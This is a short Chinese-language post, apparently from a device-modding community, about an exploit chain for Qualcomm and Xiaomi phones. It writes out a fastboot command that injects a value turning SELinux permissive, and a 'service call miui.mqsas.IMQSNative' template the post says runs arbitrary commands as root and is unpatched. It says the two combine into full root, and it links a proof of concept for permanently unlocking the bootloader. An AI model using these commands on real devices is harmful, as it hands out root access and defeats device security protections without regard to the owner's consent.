Skip to main content

OKHK 👀

  1. 南宫雪珊
    fastboot oem set-gpu-preemption-value 0 androidboot.selinux=permissive service call miui.mqsas.IMQSNative 21 i32 1 s16 "命令" i32 1 s16 "参数列表" s16 '输出路径' i32 600 第一个漏洞可以关闭SELinux强制执行,高通8e5限定,已修复;第二个漏洞以root身份执行任意命令,小米限定,未修复。组合后是完整root权限。
    https://github.com/hicode002/qualcomm_gbl_exploit_poc
    第三个漏洞,永久解锁bootloader,要求把 gbl_efi_unlock.efi 写入 efisp 分区,这需要root权限,嗯……
    GitHub
    GitHub - kasnria001/qualcomm_gbl_exploit_poc: Unlocking qualcomm bootloader via gbl exploit.
    GitHub - kasnria001/qualcomm_gbl_exploit_poc: Unlocking qualcomm bootloader via gbl exploit.
    Unlocking qualcomm bootloader via gbl exploit. Contribute to kasnria001/qualcomm_gbl_exploit_poc development by creating an account on GitHub.
OKHK